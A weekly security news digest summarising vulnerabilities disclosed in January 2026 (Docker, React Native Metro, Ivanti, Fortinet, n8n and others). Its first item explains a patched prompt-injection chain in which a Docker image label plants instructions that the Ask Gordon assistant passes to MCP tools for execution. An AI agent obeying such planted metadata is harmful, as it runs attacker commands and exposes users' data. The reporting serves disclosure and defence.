01/28/2026-02/04/2026 Docker Fixes Critical Ask Gordon AI Flaw, Critical React Native Metro Bug, Two High-Severity n8n Flaws And More

1. Docker Fixes Critical Ask Gordon AI Flaw Allowing Code Execution via Image Metadata

 Cybersecurity researchers have revealed details of a now-patched critical flaw in Ask Gordon, Docker’s AI assistant built into Docker Desktop and the Docker CLI, that could enable code execution and data exfiltration. The vulnerability was fixed in Docker version 4.50.0 released in November 2025. The issue arises because Ask Gordon treats unverified Docker image metadata as executable instructions. A single malicious LABEL field embedded in a Docker image can trigger a three-stage attack: Ask Gordon reads the instruction, forwards it to the Model Context Protocol (MCP) Gateway, and the gateway executes it using MCP tools—without validation. This could result in remote code execution on cloud and CLI systems or sensitive data exposure on desktop environments. The flaw represents a failure of contextual trust, described as Meta-Context Injection, where MCP cannot distinguish harmless metadata from pre-authorized commands. By weaponizing Docker image labels, attackers can hijack the AI’s reasoning process and bypass security boundaries.

2. Hackers Exploit Critical React Native Metro Bug to Breach Dev Systems

Hackers are actively exploiting a critical vulnerability, CVE-2025-11953, in the React Native Metro development server to target developers with malicious payloads for Windows and Linux. The flaw allows unauthenticated attackers to execute arbitrary OS commands on Windows via crafted POST requests, while on Linux and macOS it enables execution of arbitrary binaries with limited control. Metro, the default JavaScript bundler for React Native, exposes development-only HTTP endpoints by default and can bind to external network interfaces, increasing attack surface.

Researchers at JFrog disclosed the issue in November, identifying the vulnerable /open-url endpoint, which passes user-supplied input to the open() function without sanitization. The flaw affects @react-native-community/cli-server-api versions 4.8.0 through 20.0.0-alpha.2 and was fixed in version 20.0.0. VulnCheck observed in-the-wild exploitation starting December 21, 2025, with repeated attacks delivering base64-encoded PowerShell payloads that disable defenses, fetch second-stage binaries, and execute them. Despite active abuse, about 3,500 Metro servers remain exposed online.

3. Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm

Cybersecurity researchers have uncovered a supply chain attack targeting the Open VSX Registry, in which threat actors compromised a legitimate developer account to distribute malicious updates. On January 30, 2026, four popular extensions published by the developer oorzc were updated with malicious code embedding the GlassWorm malware loader, according to Socket researcher Kirill Boychenko. The extensions, some over two years old, had accumulated more than 22,000 downloads prior to the attack.

The incident is believed to stem from stolen publishing credentials, possibly via a leaked token. The malicious versions were later removed, but not before delivering a loader capable of decrypting and executing payloads at runtime. The malware targets macOS systems, harvesting browser data, cryptocurrency wallets, iCloud Keychain contents, developer credentials, and VPN configurations, posing serious risks to enterprise environments.

Unlike earlier GlassWorm campaigns that relied on typosquatting, this attack abused a trusted developer account, allowing the malware to blend into normal workflows. Researchers warn that removed extensions remain installed locally until developers release clean updates.

4. Ivanti Patches Exploited EPMM Zero-Days

Ivanti has released emergency patches for two critical zero-day vulnerabilities in Endpoint Manager Mobile (EPMM) that are being actively exploited in the wild. Tracked as CVE-2026-1281 and CVE-2026-1340 (CVSS 9.8), the flaws are unauthenticated code injection bugs that allow remote code execution. The issues affect EPMM’s in-house application distribution and Android file transfer configuration features. Successful exploitation could enable attackers to execute arbitrary code, move laterally, and access sensitive data, including administrator and user details as well as mobile device information. Ivanti says a limited number of customers were impacted at disclosure. All EPMM versions up to 12.7.0.0 and select 12.5.x and 12.6.x releases are affected. Ivanti has issued version-specific RPM patches and recommends upgrading to version 12.8.0.0 once available. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities catalog, urging organizations to prioritize remediation due to the flaw’s severity.

5. SolarWinds Web Help Desk Vulnerability Actively Exploited

A US security agency has warned that a critical remote code execution (RCE) flaw in SolarWinds Web Help Desk is being actively exploited. CISA has added CVE-2025-40551 to its KEV Catalog, giving federal civilian agencies until Friday to apply patches released last week. Rated CVSS 9.8, the vulnerability is a deserialization of untrusted data issue that allows unauthenticated attackers to gain admin-level access and execute arbitrary commands on affected systems. While the KEV mandate applies only to federal agencies, CISA urges all organizations to patch promptly due to widespread use of the software in government, education, and healthcare.

CVE-2025-40551 is one of four critical flaws fixed in a January 28 update. The others include an additional RCE vulnerability and two authentication bypass bugs, all rated 9.8. Although only one flaw is currently exploited, attackers could chain them to fully compromise systems. SolarWinds advises upgrading to Web Help Desk 2026.1 immediately.

6. Two High-Severity n8n Flaws Allow Authenticated Remote Code Execution

Cybersecurity researchers have disclosed two new vulnerabilities in the n8n workflow automation platform, including a critical flaw that could lead to full remote code execution. Identified by JFrog Security Research, CVE-2026-1470 (CVSS 9.9) allows any authenticated user to bypass n8n’s JavaScript Expression sandbox and execute arbitrary code on the main node. A second issue, CVE-2026-0863 (CVSS 8.5), enables authenticated users to escape the Python task sandbox and run arbitrary code on the host system.

Despite requiring authentication, CVE-2026-1470 is considered highly dangerous because any n8n user could completely take over an instance, including those running in “internal” execution mode. Given n8n’s access to sensitive enterprise workflows, credentials, and APIs, successful exploitation could provide attackers broad control across an organization.

Users are urged to upgrade to patched versions immediately. The disclosure follows recent reports of a separate unauthenticated n8n flaw, underscoring ongoing risks in sandboxing dynamic languages like JavaScript and Python.

01/21/2026-01/28/2026 CISA Adds Four Critical Vulnerabilities, Critical VMware RCE Flaw, Fortinet Patches CVE-2026-24858 And More

1. CISA Adds Four Critical Vulnerabilities to KEV Catalog Following Active Exploitation

CISA added four critical vulnerabilities to its KEV catalog on January 22, 2026, confirming active exploitation in the wild. The flaws affect development tools, SD-WAN infrastructure, email platforms, and package managers, highlighting a broad and urgent threat landscape. All four vulnerabilities carry a February 12, 2026, remediation deadline under Binding Operational Directive (BOD) 22-01 for federal systems and critical infrastructure operators. One vulnerability involves embedded malicious code in Prettier’s eslint-config-prettier package (CVE-2025-54313), enabling a supply-chain attack during installation. Vite’s dev server (CVE-2025-31125) allows unauthorized file access when exposed to networks. Versa Concerto’s SD-WAN platform (CVE-2025-34026) contains an authentication bypass that exposes administrative functions. Synacor Zimbra (CVE-2025-68645) is vulnerable to PHP remote file inclusion, a common initial access vector. Organizations should immediately inventory affected systems, prioritize network-exposed assets, and apply vendor patches or mitigations to reduce risk.

2. CISA Says Critical VMware RCE Flaw Now Actively Exploited

CISA has flagged a critical VMware vCenter Server vulnerability as actively exploited, ordering federal agencies to secure affected systems within three weeks. The flaw, CVE-2024-37079, was patched in June 2024 and stems from a heap overflow in vCenter Server’s DCERPC protocol implementation.

Attackers with network access can exploit the vulnerability using specially crafted packets to achieve remote code execution without authentication or user interaction, making it a low-complexity but high-impact threat. There are no workarounds or mitigations, and Broadcom has urged customers to immediately apply the latest vCenter Server and Cloud Foundation patches. CISA added the vulnerability to its KEV catalog, setting a February 13 remediation deadline under Binding Operational Directive 22-01 for Federal Civilian Executive Branch agencies. Broadcom separately confirmed in-the-wild exploitation.

CISA warned that such flaws are frequently abused and advised agencies to follow vendor guidance, apply required mitigations, or discontinue use if protections are unavailable.

3. Fortinet Patches CVE-2026-24858 After Active FortiOS SSO Exploitation Detected

Fortinet has begun releasing security updates to address a critical FortiOS authentication bypass vulnerability that is being actively exploited in the wild. Tracked as CVE-2026-24858 (CVSS 9.4), the flaw affects FortiOS, FortiManager, and FortiAnalyzer and is tied to FortiCloud single sign-on (SSO). The vulnerability allows an attacker with a FortiCloud account and registered device to gain administrative access to other customers’ devices when FortiCloud SSO is enabled, bypassing authentication through an alternate access path. While FortiCloud SSO is disabled by default, it may be enabled when devices are registered through the GUI. Fortinet confirmed threat actors abused a new attack path to create local admin accounts, modify VPN access, and exfiltrate firewall configurations. In response, Fortinet disabled and re-enabled FortiCloud SSO with added protections and locked malicious accounts. CISA has added the flaw to its Known Exploited Vulnerabilities catalog, requiring Federal Civilian Executive Branch agencies to remediate by January 30, 2026.

4. Critical Grist-Core Vulnerability Allows RCE Attacks via Spreadsheet Formulas

A critical remote code execution flaw has been disclosed in Grist-Core, the open-source, self-hosted version of the Grist spreadsheet-database platform. Tracked as CVE-2026-24002 (CVSS 9.1) and codenamed Cellbreak, the vulnerability allows a single malicious formula to escape Grist’s Python sandbox and execute commands on the host system. The issue stems from Grist’s use of Pyodide to run untrusted Python formulas in a WebAssembly sandbox. Researchers found that a blocklist-based design allows traversal of Python internals and access to runtime functions, enabling OS command execution and host-level JavaScript execution. Successful exploitation could expose files, database credentials, API keys, and enable lateral movement.

The flaw was fixed in Grist version 1.7.9, released January 9, 2026. Instances using the “gvisor” sandbox are not affected, while those running Pyodide must upgrade immediately. As a temporary mitigation, operators can switch the GRIST_SANDBOX_FLAVOR setting to “gvisor” and avoid disabling Deno-based protections when handling untrusted formulas.

5. Malicious AI Extensions On VSCode Marketplace Steal Developer Data

Two malicious extensions in Microsoft’s Visual Studio Code Marketplace, installed a combined 1.5 million times, were found exfiltrating developer data to servers in China. Marketed as AI-powered coding assistants, the extensions provide expected functionality but fail to disclose extensive data collection or obtain user consent. Researchers at Koi Security identified the campaign, dubbed MaliciousCorgi, noting both extensions share the same data-stealing code and backend infrastructure. The affected extensions—ChatGPT – 中文版 (1.34 million installs) and ChatMoss (CodeMoss) (150,000 installs)—remain available at the time of reporting. The extensions employ multiple spyware techniques, including monitoring files opened in VS Code and transmitting entire file contents in real time, executing server-controlled commands to harvest workspace files, and embedding analytics SDKs to profile users and fingerprint devices. Koi warned this activity risks exposing source code, configuration files, credentials, and API keys. Microsoft confirmed it is investigating the report and will take action in accordance with its policies.

01/14/2026-01/21/2026 Critical Flaw in Modular DS WordPress Plugin, Binary-parser Bug Allows Node.js Privilege-Level Code Execution, Hackers Target Developers via Malicious VS Code Projects And More.

1. Actively Exploited Critical Flaw in Modular DS WordPress Plugin Enables Admin Takeover

A critical vulnerability in the Modular DS WordPress plugin (CVE-2026-23550, CVSS 10.0) is being actively exploited, allowing unauthenticated attackers to escalate privileges. Modular DS, installed on over 40,000 sites, enables centralized monitoring, updates, and remote administration of WordPress installations. In versions 2.5.1 and earlier, the flaw allows attackers to bypass authentication by abusing exposed API routes under /api/modular-connector/. A flawed isDirectRequest() check treats requests containing simple parameters (origin=mo&type=xxx) as trusted “direct” requests, without validating signatures, secrets, IPs, or User-Agent headers. If a site is already connected to Modular, attackers can access sensitive routes such as /login, /system, and /backup, leading to admin takeover and data theft. Exploitation began on January 13, 2026, with attackers targeting the login API to create new admin users. The issue was fixed in version 2.5.2 by tightening route handling and validation. Users should update immediately to mitigate risk.

2. CERT/CC Warns Binary-parser Bug Allows Node.js Privilege-Level Code Execution

A security vulnerability has been disclosed in the popular binary-parser npm library that could allow attackers to execute arbitrary JavaScript. Tracked as CVE-2026-1245, the flaw affects all versions prior to 2.3.0, which was released on November 26, 2025 to address the issue. Binary-parser is a widely used JavaScript parser builder for binary data, supporting multiple data types and receiving roughly 13,000 weekly downloads. According to CERT/CC, the vulnerability stems from insufficient sanitization of user-supplied values—such as parser field names and encoding parameters—when generating parser code dynamically at runtime using the Function constructor. Because the library builds JavaScript source code as a string and compiles it for execution, attacker-controlled input can be injected into the generated code, leading to arbitrary code execution within the Node.js process. Applications using only static, hard-coded parser definitions are not affected. Users are strongly advised to upgrade to version 2.3.0 and avoid passing untrusted input into parser definitions.

3. Hackers Exploiting Critical Fortinet FortiSIEM Flaw in Attacks

A critical Fortinet FortiSIEM vulnerability (CVE-2025-64155) with publicly available proof-of-concept exploit code is now being actively exploited in the wild. Reported by Horizon3.ai researcher Zach Hanley, the flaw combines multiple issues that allow unauthenticated attackers to perform arbitrary file writes, escalate privileges, and ultimately gain root-level code execution. Fortinet described the issue as an OS command injection vulnerability that can be triggered via crafted TCP requests. Horizon3.ai’s analysis revealed that dozens of command handlers exposed through the phMonitor service can be accessed remotely without authentication. By abusing argument injection, attackers can overwrite system files such as /opt/charting/redishb.sh to execute code as root. The vulnerability affects FortiSIEM versions 6.7 through 7.5. Patches are available in newer releases, while administrators unable to update immediately are advised to restrict access to the phMonitor port (7900). Threat intelligence firm Defused has confirmed active exploitation, urging defenders to check phMonitor logs for signs of compromise.

4. North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

North Korean threat actors behind the long-running Contagious Interview campaign are using malicious Visual Studio Code (VS Code) projects to distribute backdoors. The tactic targets software developers through fake job assessments that instruct victims to clone GitHub, GitLab, or Bitbucket repositories and open them in VS Code. When a victim trusts the repository, malicious tasks.json files are automatically executed, abusing the runOn: folderOpen option to fetch and run obfuscated JavaScript payloads hosted on Vercel. On macOS, the attack uses background shell commands to pipe remote JavaScript directly into Node.js, enabling persistent execution even after VS Code closes. The payload deploys backdoors such as BeaverTail and InvisibleFerret, enabling remote code execution, system profiling, and continuous command-and-control communication. Later stages may introduce fallback infection methods, malicious npm packages, credential theft, crypto mining, and remote access tools. Developers are urged to carefully vet repositories, review task configurations, and avoid untrusted coding tests.

5. AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks

A critical misconfiguration in AWS CodeBuild, dubbed CodeBreach by Wiz, could have enabled attackers to take over several AWS-managed GitHub repositories, including the AWS JavaScript SDK, creating a severe supply chain risk. The issue was responsibly disclosed on August 25, 2025, and fixed by AWS in September. The flaw stemmed from improperly configured CI webhook filters intended to restrict which GitHub users could trigger builds. Four AWS repositories used regex-based actor ID filters that lacked start (^) and end ($) anchors, allowing attackers to bypass restrictions by registering GitHub accounts with numeric IDs containing a trusted maintainer’s ID as a substring. Because GitHub user IDs are sequential, these IDs could be predicted and generated using automated bot accounts. By triggering a build, an attacker could access privileged GitHub tokens with admin rights, enabling direct code pushes, pull request approvals, and secret exfiltration. AWS confirmed the issue was limited to specific projects, implemented mitigations, rotated credentials, and found no evidence of exploitation in the wild.